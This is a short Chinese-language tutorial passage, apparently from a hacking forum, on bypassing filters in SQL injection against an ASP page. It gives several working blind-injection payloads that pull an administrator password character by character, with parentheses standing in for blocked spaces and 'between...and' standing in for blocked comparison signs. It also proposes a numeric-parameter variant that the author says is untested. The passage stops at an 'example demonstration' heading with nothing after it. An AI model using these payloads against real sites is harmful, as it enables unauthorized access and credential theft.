舉個例 子說一下， 我們得到一個注入點：jmdcw.asp?name=aa'and 1=1 and ''='， 如果替換其中的1=1為查詢管理員的密碼的語句：

(select asc(mid(pass,1,1)) from [name] where id=1)>49

如何用空格呢？其實可以寫成這樣的：

jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='

如果屏蔽了<和>符號， 則用between…and…， 語句是：

jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

對于中間應(yīng)該出現(xiàn)空格的地方， 用()進(jìn)行替換， 不過， 對于很復(fù)雜的SQL語句就不太好用了。 上面說到的是字符型的， 如果是數(shù)值型， 可以在id=1后加一個括號， 不過這個我沒有測試，

比如:jmdcw.asp?id=(1)and(select.....)， 應(yīng)該是可行的吧？

實例演示：